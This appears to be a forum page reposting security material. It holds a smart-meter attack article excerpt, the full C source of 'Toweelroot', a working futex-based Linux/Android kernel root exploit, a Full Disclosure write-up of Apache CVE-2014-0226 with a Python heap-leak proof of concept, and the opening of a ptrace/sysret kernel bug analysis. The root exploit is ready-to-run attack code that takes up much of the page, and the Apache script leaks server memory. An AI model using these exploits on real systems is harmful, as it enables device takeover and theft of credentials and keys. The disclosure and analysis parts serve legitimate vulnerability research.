
None of the above attacks are inevitable. You can build defenses against all of them. However, it is inevitable that somewhere, somehow, the defenses will fail. These attacks are possible, and we will have to figure out how to defend against them, especially once smart meters become more prevalent.
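To see why bare consumption data is sensitive on its own, here is a toy C sketch of the occupancy inference described above. The hourly readings and the 0.2 kWh baseline are invented purely for illustration; a real snoop would pull the numbers from whatever leaky API, app or website exposes them.

/* Toy illustration of occupancy inference from meter readings.
 * The readings and the 0.2 kWh threshold are invented for the example. */
#include <stdio.h>

int main(void)
{
    /* hourly consumption in kWh for one day (hypothetical data) */
    double kwh[24] = {0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.4, 0.6,
                      0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1,
                      0.1, 0.3, 0.7, 0.9, 0.8, 0.5, 0.3, 0.2};
    const double baseline = 0.2;   /* fridge, standby loads, etc. */

    for (int h = 0; h < 24; h++)
        printf("%02d:00  %.1f kWh  %s\n", h, kwh[h],
               kwh[h] > baseline ? "someone is probably home" : "probably empty");
    return 0;
}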
All of the attacks I discussed above are essentially small-scale, however. What happens when you look at the security of not just individual meters, but the smart grid as a whole? That’s what we will discuss in the third post in this three-part series on smart meters and smart grids. Sursa: Smart Meter Attack Scenarios | Security Intelligence Blog | Trend Micro
-
/* getroot 2014/07/12 */ /* * Copyright © 2014 CUBE * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <pthread.h> #include <sys/mman.h> #include <sys/syscall.h> #include <linux/futex.h> #include <sys/resource.h> #include <string.h> #include <fcntl.h> #define FUTEX_WAIT_REQUEUE_PI 11 #define FUTEX_CMP_REQUEUE_PI 12 struct mmsghdr { struct msghdr msg_hdr; unsigned int msg_len; }; //rodata const char str_ffffffff[] = {0xff, 0xff, 0xff, 0xff, 0}; const char str_1[] = {1, 0, 0, 0, 0}; //bss int _swag = 0; int _swag2 = 0; unsigned long HACKS_final_stack_base = 0; pid_t waiter_thread_tid; pthread_mutex_t done_lock; pthread_cond_t done; pthread_mutex_t is_thread_desched_lock; pthread_cond_t is_thread_desched; int do_socket_tid_read = 0; int did_socket_tid_read = 0; int do_splice_tid_read = 0; int did_splice_tid_read = 0; int do_dm_tid_read = 0; int did_dm_tid_read = 0; pthread_mutex_t is_thread_awake_lock; pthread_cond_t is_thread_awake; int HACKS_fdm = 0; unsigned long MAGIC = 0; unsigned long MAGIC_ALT = 0; pthread_mutex_t *is_kernel_writing; pid_t last_tid = 0; int g_argc; char rootcmd[256]; ssize_t read_pipe(void *writebuf, void *readbuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); len = write(pipefd[1], writebuf, count); if (len != count) { printf("FAILED READ @ %p : %d %d\n", writebuf, (int)len, errno); while (1) { sleep(10); } } read(pipefd[0], readbuf, count); close(pipefd[0]); close(pipefd[1]); return len; } ssize_t write_pipe(void *readbuf, void *writebuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); write(pipefd[1], writebuf, count); len = read(pipefd[0], readbuf, count); if (len != count) { printf("FAILED WRITE @ %p : %d %d\n", readbuf, (int)len, errno); while (1) { sleep(10); } } close(pipefd[0]); close(pipefd[1]); return len; } void write_kernel(int signum) { char *slavename; int pipefd[2]; char readbuf[0x100]; unsigned long stackbuf[4]; unsigned long buf_a[0x100]; unsigned long val1; unsigned long buf_b[0x40]; unsigned long val2; unsigned long buf_c[6]; pid_t pid; int i; int ret; pthread_mutex_lock(&is_thread_awake_lock); pthread_cond_signal(&is_thread_awake); pthread_mutex_unlock(&is_thread_awake_lock); if (HACKS_final_stack_base == 0) { printf("cpid1 resumed.\n"); pthread_mutex_lock(is_kernel_writing); HACKS_fdm = open("/dev/ptmx", O_RDWR); unlockpt(HACKS_fdm); slavename = ptsname(HACKS_fdm); open(slavename, O_RDWR); do_splice_tid_read = 1; while (1) { if (did_splice_tid_read != 0) { break; } } read(HACKS_fdm, readbuf, 0x100); write_pipe((void *)(HACKS_final_stack_base + 8), (void *)str_ffffffff, 4); pthread_mutex_unlock(is_kernel_writing); while (1) { sleep(10); } } printf("cpid3 resumed.\n"); pthread_mutex_lock(is_kernel_writing); printf("hack.\n"); read_pipe((void *)HACKS_final_stack_base, stackbuf, 0x10); read_pipe((void *)(stackbuf[3]), buf_a, 0x400); val1 = 0; val2 = 0; pid = 
0; for (i = 0; i < 0x100; i++) { if (buf_a == buf_a[i + 1]) { if (buf_a > 0xc0000000) { if (buf_a[i + 2] == buf_a[i + 3]) { if (buf_a[i + 2] > 0xc0000000) { if (buf_a[i + 4] == buf_a[i + 5]) { if (buf_a[i + 4] > 0xc0000000) { if (buf_a[i + 6] == buf_a[i + 7]) { if (buf_a[i + 6] > 0xc0000000) { val1 = buf_a[i + 7]; break; } } } } } } } } } read_pipe((void *)val1, buf_b, 0x100); val2 = buf_b[0x16]; if (val2 > 0xc0000000) { if (val2 < 0xffff0000) { read_pipe((void *)val2, buf_c, 0x18); if (buf_c[0] != 0) { if (buf_c[1] != 0) { if (buf_c[2] == 0) { if (buf_c[3] == 0) { if (buf_c[4] == 0) { if (buf_c[5] == 0) { buf_c[0] = 1; buf_c[1] = 1; write_pipe((void *)val2, buf_c, 0x18); } } } } } } } } buf_b[1] = 0; buf_b[2] = 0; buf_b[3] = 0; buf_b[4] = 0; buf_b[5] = 0; buf_b[6] = 0; buf_b[7] = 0; buf_b[8] = 0; buf_b[10] = 0xffffffff; buf_b[11] = 0xffffffff; buf_b[12] = 0xffffffff; buf_b[13] = 0xffffffff; buf_b[14] = 0xffffffff; buf_b[15] = 0xffffffff; buf_b[16] = 0xffffffff; buf_b[17] = 0xffffffff; write_pipe((void *)val1, buf_b, 0x48); pid = syscall(__NR_gettid); i = 0; while (1) { if (buf_a == pid) { write_pipe((void *)(stackbuf[3] + (i << 2)), (void *)str_1, 4); if (getuid() != 0) { printf("root failed.\n"); while (1) { sleep(10); } } else { break; } } i++; } //rooted sleep(1); if (g_argc >= 2) { system(rootcmd); } system("/system/bin/touch /dev/rooted"); pid = fork(); if (pid == 0) { while (1) { ret = access("/dev/rooted", F_OK); if (ret >= 0) { break; } } printf("wait 10 seconds...\n"); sleep(10); printf("rebooting...\n"); sleep(1); system("reboot"); while (1) { sleep(10); } } pthread_mutex_lock(&done_lock); pthread_cond_signal(&done); pthread_mutex_unlock(&done_lock); while (1) { sleep(10); } return; } void *make_action(void *arg) { int prio; struct sigaction act; int ret; prio = (int)arg; last_tid = syscall(__NR_gettid); pthread_mutex_lock(&is_thread_desched_lock); pthread_cond_signal(&is_thread_desched); act.sa_handler = write_kernel; act.sa_mask = 0; act.sa_flags = 0; act.sa_restorer = NULL; sigaction(12, &act, NULL); setpriority(PRIO_PROCESS, 0, prio); pthread_mutex_unlock(&is_thread_desched_lock); do_dm_tid_read = 1; while (1) { if (did_dm_tid_read != 0) { break; } } ret = syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); printf("futex dm: %d\n", ret); while (1) { sleep(10); } return NULL; } pid_t wake_actionthread(int prio) { pthread_t th4; pid_t pid; char filename[256]; FILE *fp; char filebuf[0x1000]; char *pdest; int vcscnt, vcscnt2; do_dm_tid_read = 0; did_dm_tid_read = 0; pthread_mutex_lock(&is_thread_desched_lock); pthread_create(&th4, 0, make_action, (void *)prio); pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock); pid = last_tid; sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } while (1) { if (do_dm_tid_read != 0) { break; } usleep(10); } did_dm_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 == vcscnt + 1) { break; } usleep(10); } pthread_mutex_unlock(&is_thread_desched_lock); return pid; } int make_socket() { int sockfd; struct sockaddr_in addr = {0}; int ret; int sock_buf_size; sockfd = socket(AF_INET, SOCK_STREAM, 
SOL_TCP); if (sockfd < 0) { printf("socket failed.\n"); usleep(10); } else { addr.sin_family = AF_INET; addr.sin_port = htons(5551); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); } while (1) { ret = connect(sockfd, (struct sockaddr *)&addr, 16); if (ret >= 0) { break; } usleep(10); } sock_buf_size = 1; setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size)); return sockfd; } void *send_magicmsg(void *arg) { int sockfd; struct mmsghdr msgvec[1]; struct iovec msg_iov[8]; unsigned long databuf[0x20]; int i; int ret; waiter_thread_tid = syscall(__NR_gettid); setpriority(PRIO_PROCESS, 0, 12); sockfd = make_socket(); for (i = 0; i < 0x20; i++) { databuf = MAGIC; } for (i = 0; i < 8; i++) { msg_iov.iov_base = (void *)MAGIC; msg_iov.iov_len = 0x10; } msgvec[0].msg_hdr.msg_name = databuf; msgvec[0].msg_hdr.msg_namelen = 0x80; msgvec[0].msg_hdr.msg_iov = msg_iov; msgvec[0].msg_hdr.msg_iovlen = 8; msgvec[0].msg_hdr.msg_control = databuf; msgvec[0].msg_hdr.msg_controllen = 0x20; msgvec[0].msg_hdr.msg_flags = 0; msgvec[0].msg_len = 0; syscall(__NR_futex, &_swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &_swag2, 0); do_socket_tid_read = 1; while (1) { if (did_socket_tid_read != 0) { break; } } ret = 0; while (1) { ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0); if (ret <= 0) { break; } } if (ret < 0) { perror("SOCKSHIT"); } printf("EXIT WTF\n"); while (1) { sleep(10); } return NULL; } void *search_goodnum(void *arg) { int ret; char filename[256]; FILE *fp; char filebuf[0x1000]; char *pdest; int vcscnt, vcscnt2; unsigned long magicval; pid_t pid; unsigned long goodval, goodval2; unsigned long addr, setaddr; int i; char buf[0x1000]; syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); while (1) { ret = syscall(__NR_futex, &_swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag); if (ret == 1) { break; } usleep(10); } wake_actionthread(6); wake_actionthread(7); _swag2 = 0; do_socket_tid_read = 0; did_socket_tid_read = 0; syscall(__NR_futex, &_swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag2); while (1) { if (do_socket_tid_read != 0) { break; } } sprintf(filename, "/proc/self/task/%d/status", waiter_thread_tid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } did_socket_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", waiter_thread_tid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 == vcscnt + 1) { break; } usleep(10); } printf("starting the dangerous things.\n"); *((unsigned long *)(MAGIC_ALT - 4)) = 0x81; *((unsigned long *)MAGIC_ALT) = MAGIC_ALT + 0x20; *((unsigned long *)(MAGIC_ALT + 8)) = MAGIC_ALT + 0x28; *((unsigned long *)(MAGIC_ALT + 0x1c)) = 0x85; *((unsigned long *)(MAGIC_ALT + 0x24)) = MAGIC_ALT; *((unsigned long *)(MAGIC_ALT + 0x2c)) = MAGIC_ALT + 8; *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; magicval = *((unsigned long *)MAGIC); wake_actionthread(11); if (*((unsigned long *)MAGIC) == magicval) { printf("using MAGIC_ALT.\n"); MAGIC = MAGIC_ALT; } while (1) { is_kernel_writing = (pthread_mutex_t *)malloc(4); 
pthread_mutex_init(is_kernel_writing, NULL); *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; pid = wake_actionthread(11); goodval = *((unsigned long *)MAGIC) & 0xffffe000; printf("%p is a good number.\n", (void *)goodval); do_splice_tid_read = 0; did_splice_tid_read = 0; pthread_mutex_lock(&is_thread_awake_lock); kill(pid, 12); pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock); pthread_mutex_unlock(&is_thread_awake_lock); while (1) { if (do_splice_tid_read != 0) { break; } usleep(10); } sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } did_splice_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 != vcscnt + 1) { break; } usleep(10); } goodval2 = 0; *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; *((unsigned long *)(MAGIC + 0x24)) = goodval + 8; wake_actionthread(12); goodval2 = *((unsigned long *)(MAGIC + 0x24)); printf("%p is also a good number.\n", (void *)goodval2); for (i = 0; i < 9; i++) { *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; pid = wake_actionthread(10); if (*((unsigned long *)MAGIC) < goodval2) { HACKS_final_stack_base = *((unsigned long *)MAGIC) & 0xffffe000; pthread_mutex_lock(&is_thread_awake_lock); kill(pid, 12); pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock); pthread_mutex_unlock(&is_thread_awake_lock); write(HACKS_fdm, buf, 0x1000); while (1) { sleep(10); } } } } return NULL; } void *accept_socket(void *arg) { int sockfd; int yes; struct sockaddr_in addr = {0}; int ret; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); yes = 1; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes)); addr.sin_family = AF_INET; addr.sin_port = htons(5551); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)); listen(sockfd, 1); while(1) { ret = accept(sockfd, NULL, NULL); if (ret < 0) { printf("**** SOCK_PROC failed ****\n"); while(1) { sleep(10); } } else { printf("i have a client like hookers.\n"); } } return NULL; } void init_exploit() { unsigned long addr; pthread_t th1, th2, th3; printf("running with pid %d\n", getpid()); pthread_create(&th1, NULL, accept_socket, NULL); addr = (unsigned long)mmap((void *)0xa0000000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); addr += 0x800; MAGIC = addr; if ((long)addr >= 0) { printf("first mmap failed?\n"); while (1) { sleep(10); } } addr = (unsigned long)mmap((void *)0x100000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | 
MAP_FIXED | MAP_ANONYMOUS, -1, 0); addr += 0x800; MAGIC_ALT = addr; if (addr > 0x110000) { printf("second mmap failed?\n"); while (1) { sleep(10); } } pthread_mutex_lock(&done_lock); pthread_create(&th2, NULL, search_goodnum, NULL); pthread_create(&th3, NULL, send_magicmsg, NULL); pthread_cond_wait(&done, &done_lock); return; } int main(int argc, char **argv) { g_argc = argc; if (argc >= 2) { strcpy(rootcmd, argv[1]); } init_exploit(); printf("\n"); printf("done root command.\n"); while (1) { sleep(10); } return 0; } Sursa: [C] Toweelroot - Pastebin.com
-
Apache HTTPd - description of the CVE-2014-0226.
From: funky.koval () hushmail com
Date: Mon, 21 Jul 2014 08:55:19 +0000

Hi there,

--[ 0. Sparse summary

Race condition between updating httpd's "scoreboard" and mod_status, leading to several critical scenarios like heap buffer overflow with user supplied payload and leaking heap which can leak critical memory containing htaccess credentials, ssl certificate private keys and so on.

--[ 1. Prerequisites

Apache httpd compiled with MPM event or MPM worker. The tested version was 2.4.7 compiled with:

./configure --enable-mods-shared=reallyall --with-included-apr

The tested mod_status configuration in httpd.conf was:

<Location /foo>
    SetHandler server-status
</Location>
ExtendedStatus On

--[ 2. Race Condition

Function ap_escape_logitem in server/util.c looks as follows:

1908 AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char *str)
1909 {
1910     char *ret;
1911     unsigned char *d;
1912     const unsigned char *s;
1913     apr_size_t length, escapes = 0;
1914
1915     if (!str) {
1916         return NULL;
1917     }
1918
1919     /* Compute how many characters need to be escaped */
1920     s = (const unsigned char *)str;
1921     for (; *s; ++s) {
1922         if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {
1923             escapes++;
1924         }
1925     }
1926
1927     /* Compute the length of the input string, including NULL */
1928     length = s - (const unsigned char *)str + 1;
1929
1930     /* Fast path: nothing to escape */
1931     if (escapes == 0) {
1932         return apr_pmemdup(p, str, length);
1933     }

In the for-loop between lines 1921 and 1925 the function is computing the length of the supplied str (almost like strlen, but additionally it counts special characters which need to be escaped). As the comment in line 1927 says, the function computes the count of bytes to copy. If there's nothing to escape, the function uses apr_pmemdup to duplicate the str.

In our single-threaded mind everything looks good, but the tricky part starts when we introduce multi-threading. Apache in MPM mode runs workers as threads, so let's consider the following scenario:

1) ap_escape_logitem(pool, "") is called
2) the for-loop in line 1921 immediately escapes, because *s is '\0' in the first loop run
3) a malicious thread changes the memory under *s to another value (something which is not '\0')
4) apr_pmemdup copies that changed value to a new string and returns it

Output from ap_escape_logitem is considered to be a string; if the scenario above would occur, the returned string would not be zeroed at the end, which may be harmful. The mod_status code looks as follows:

833                     ap_rprintf(r, "<td>%s</td><td nowrap>%s</td>"
834                                "<td nowrap>%s</td></tr>\n\n",
835                                ap_escape_html(r->pool,
836                                               ws_record->client),
837                                ap_escape_html(r->pool,
838                                               ws_record->vhost),
839                                ap_escape_html(r->pool,
840                                               ap_escape_logitem(r->pool,
841                                                                 ws_record->request)));

The relevant call to ap_escape_html() is at line 839 after the evaluation of ap_escape_logitem(). The first argument passed to the ap_escape_logitem() is in fact an apr pool associated with the HTTP request and defined in the request_rec structure. This code is a part of a larger for-loop where code is iterating over worker_score structs which is defined as follows:

90 struct worker_score {
91 #if APR_HAS_THREADS
92     apr_os_thread_t tid;
93 #endif
94     int thread_num;
95     /* With some MPMs (e.g., worker), a worker_score can represent
96      * a thread in a terminating process which is no longer
97      * represented by the corresponding process_score. These MPMs
98      * should set pid and generation fields in the worker_score.
99      */
100     pid_t pid;
101     ap_generation_t generation;
102     unsigned char status;
103     unsigned short conn_count;
104     apr_off_t conn_bytes;
105     unsigned long access_count;
106     apr_off_t bytes_served;
107     unsigned long my_access_count;
108     apr_off_t my_bytes_served;
109     apr_time_t start_time;
110     apr_time_t stop_time;
111     apr_time_t last_used;
112 #ifdef HAVE_TIMES
113     struct tms times;
114 #endif
115     char client[40];  /* Keep 'em small... but large enough to hold an IPv6 address */
116     char request[64]; /* We just want an idea... */
117     char vhost[32];   /* What virtual host is being accessed? */
118 };

The 'request' field in a worker_score structure is particularly interesting - this field can be changed inside the copy_request function, which is called by update_child_status_internal. This change may occur while mod_status is iterating over the workers and calling ap_escape_logitem in a different thread, leading to a race condition. We can trigger this exact scenario in order to return a string without a trailing '\0'. This can be achieved by running two clients, one triggering the mod_status handler and a second sending random requests to the web server. Let's consider the following example:

1) mod_status iterates over workers invoking update_child_status_internal()
2) at some point for one worker mod_status calls ap_escape_logitem(pool, ws_record->request)
3) let's assume that ws_record->request at the beginning has '\0' literally at the first byte
4) inside the ap_escape_logitem function the length of ws_record->request is computed, which is 1 (an empty string consisting of '\0')
5) another thread modifies ws_record->request (in fact it's called ws->request in the update_child_status_internal function but it's exactly the same location in memory) and puts there i.e. "GET / HTTP/1.0"
6) the apr_pmemdup(pool, str, 1) in ap_escape_logitem copies the first one byte from "GET / HTTP/1.0" - "G" in that case - and returns it.

The apr_pmemdup looks as follows:

112 APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void *m, apr_size_t n)
113 {
114     void *res;
115
116     if (m == NULL)
117         return NULL;
118     res = apr_palloc(a, n);
119     memcpy(res, m, n);
120     return res;
121 }

It allocates memory using the apr_palloc function which returns "dirty" memory (note that apr_pcalloc overwrites the allocated memory with NULs). So it's non-deterministic what's after the copied "G" byte. There might be a '\0' there or there might not. For now let's assume that the memory allocated by apr_palloc was dirty (containing random bytes).

7) ap_escape_logitem returns "G" followed by junk bytes, with no guarantee of a terminating '\0'.

The value from the example above is then pushed to the ap_escape_html2 function which is also declared in util.c:

1860 AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char *s, int toasc)
1861 {
1862     int i, j;
1863     char *x;
1864
1865     /* first, count the number of extra characters */
1866     for (i = 0, j = 0; s[i] != '\0'; i++)
1867         if (s[i] == '<' || s[i] == '>')
1868             j += 3;
1869         else if (s[i] == '&')
1870             j += 4;
1871         else if (s[i] == '"')
1872             j += 5;
1873         else if (toasc && !apr_isascii(s[i]))
1874             j += 5;
1875
1876     if (j == 0)
1877         return apr_pstrmemdup(p, s, i);
1878
1879     x = apr_palloc(p, i + j + 1);
1880     for (i = 0, j = 0; s[i] != '\0'; i++, j++)
1881         if (s[i] == '<') {
1882             memcpy(&x[j], "&lt;", 4);
1883             j += 3;
1884         }
1885         else if (s[i] == '>') {
1886             memcpy(&x[j], "&gt;", 4);
1887             j += 3;
1888         }
1889         else if (s[i] == '&') {
1890             memcpy(&x[j], "&amp;", 5);
1891             j += 4;
1892         }
1893         else if (s[i] == '"') {
1894             memcpy(&x[j], "&quot;", 6);
1895             j += 5;
1896         }
1897         else if (toasc && !apr_isascii(s[i])) {
1898             char *esc = apr_psprintf(p, "&#%3.3d;", (unsigned char)s[i]);
1899             memcpy(&x[j], esc, 6);
1900             j += 5;
1901         }
1902         else
1903             x[j] = s[i];
1904
1905     x[j] = '\0';
1906     return x;
1907 }

If the string from the example above would be passed to this function we should get the following code-flow:

1) in the for-loop started in line 1866 we count the length of the escaped string
2) because the 's' string contains junk (due to only one byte being allocated by the apr_palloc function), it may contain a '>' character. Let's assume that this is our case
3) after the for-loop in line 1866, 'j' is greater than 0 (at least one s[i] equals '>' as assumed above)
4) in line 1879 memory for the escaped 'd' string is allocated
5) the for-loop started in line 1880 copies string 's' to the escaped 'd' string BUT apr_palloc has allocated only one byte for 's'. Thus, for each i > 0 the loop reads random memory and copies that value to the 'd' string.

At this point it's possible to trigger an information leak vulnerability (see section 5). However the 's' string may overlap with 'd', i.e.: 's' is allocated under 0 with contents s = "AAAAAAAA>", 'd' is allocated under 8, then s[8] = d[0]. If that would be the case, then the for-loop would run forever (s[i] would never be '\0' since it was overwritten in the loop by a non-zero value). Forever... until it hits unmapped memory or a read only area.
Part of the scoreboard.c code which may overwrite the ws_record->request was discovered using a tsan: #1 ap_escape_logitem ??:0 (exe+0x0000000411f2) #2 status_handler /home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839 (mod_status.so+0x0000000044b0) #3 ap_run_handler ??:0 (exe+0x000000084d98) #4 ap_invoke_handler ??:0 (exe+0x00000008606e) #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9) #6 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b143e) #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) #8 ap_run_process_connection ??:0 (exe+0x00000009d156) #9 process_socket event.c:0 (exe+0x0000000cc65e) #10 worker_thread event.c:0 (exe+0x0000000d0945) #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) #12 :0 (libtsan.so.0+0x00000001b279) Previous write of size 1 at 0x7feff2b862b8 by thread T2: #0 update_child_status_internal scoreboard.c:0 (exe+0x00000004d4c6) #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693) #2 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b139a) #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) #4 ap_run_process_connection ??:0 (exe+0x00000009d156) #5 process_socket event.c:0 (exe+0x0000000cc65e) #6 worker_thread event.c:0 (exe+0x0000000d0945) #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) #8 :0 (libtsan.so.0+0x00000001b279) --[ 3. Consequences Race condition described in section 2, may lead to: - information leak in case when the string returned by ap_escape_logitem is not at the end, junk after copied bytes may be valuable - overwriting heap with a user supplied value which may imply code execution --[ 4. Exploitation In order to exploit the heap overflow bug it's necessary to get control over: 1) triggering the race-condition bug 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap 3) part of 's' which doesn't overlap with 'd' (this string is copied over and over again) 4) overwriting the heap in order to get total control over the cpu or at least modify the apache's handler code flow for our benefits --[ 5. Information Disclosure Proof of Concept -- cut #! /usr/bin/env python import httplib import sys import threading import subprocess import random def send_request(method, url): try: c = httplib.HTTPConnection('127.0.0.1', 80) c.request(method,url); if "foo" in url: print c.getresponse().read() c.close() except Exception, e: print e pass def mod_status_thread(): while True: send_request("GET", "/foo?notables") def requests(): evil = ''.join('A' for i in range(random.randint(0, 1024))) while True: send_request(evil, evil) threading.Thread(target=mod_status_thread).start() threading.Thread(target=requests).start() -- cut Below are the information leak samples gathered by running the poc against the testing Apache instance. Leaks include i.e. HTTP headers, htaccess content, httpd.conf content etc. On a live systems with a higher traffic samples should be way more interesting. 
$ ./poc.py | grep "" |grep -v AAAA | grep -v "{}"| grep -v notables 127.0.0.1 {A} [] 127.0.0.1 {A.01 cu0 cs0 127.0.0.1 {A27.0.0.1} [] 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0 127.0.0.1 {A Û [] 127.0.0.1 {A HTTP/1.1} [] 127.0.0.1 {Ab><br /> 127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br /> 127.0.0.1 {A0.1.1:19666]</b><br /> 127.0.0.1 {A§} [] 127.0.0.1 {A cs0 127.0.0.1 {Adentity 127.0.0.1 {A HTTP/1.1} [] 127.0.0.1 {Ape: text/html; charset=ISO-8859-1 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} [] 127.0.0.1 {Aÿÿÿÿÿÿÿ} [] 127.0.0.1 {Aanilla/htdocs/foo} [] 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} [] 127.0.0.1 {A......................................... } [] 127.0.0.1 {A-2014 16:23:30 CEST} [] 127.0.0.1 {Acontent of htaccess 127.0.0.1 {Aver: Apache/2.4.7 (Unix) 127.0.0.1 {Aroxy:balancer://mycluster} [] We hope you enjoyed it. Regards, Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 P.S. Re http://1337day.com/exploits/22451 , srsly? Either fake and someone tries to impersonate http://people.apache.org/~jorton/ or shame on you mate. Attachment: cve-2014-0226.txt Sursa: Full Disclosure: Apache HTTPd - description of the CVE-2014-0226.
-
CVE-2014-4699: Linux Kernel ptrace/sysret vulnerability analysis
by Vitaly Nikolenko
Posted on July 21, 2014 at 6:52 PM

Introduction

I believe this bug was first discovered around 2005 and affected a number of operating systems (not just Linux) on Intel 64-bit CPUs. The bug is basically in how the SYSRET instruction is used by 64-bit kernels in the system call exit path. Unlike its slower alternative IRET, SYSRET does not restore all regular registers, segment registers or rflags. This is why it's faster than IRET. I've released the PoC code (on Twitter last week) that triggers the #GP in SYSRET and overwrites the #PF handler, transferring the execution flow to the NOP sled mapped at a specific memory address in user-space. The following is my attempt to explain how this vulnerability is triggered.

First, let's take a step back to see what the SYSRET instruction actually does. According to AMD, SYSRET does the following:

- Load the instruction pointer (%rip) from %rcx
- Change the code segment selector to guest mode (this effectively changes the privilege level)

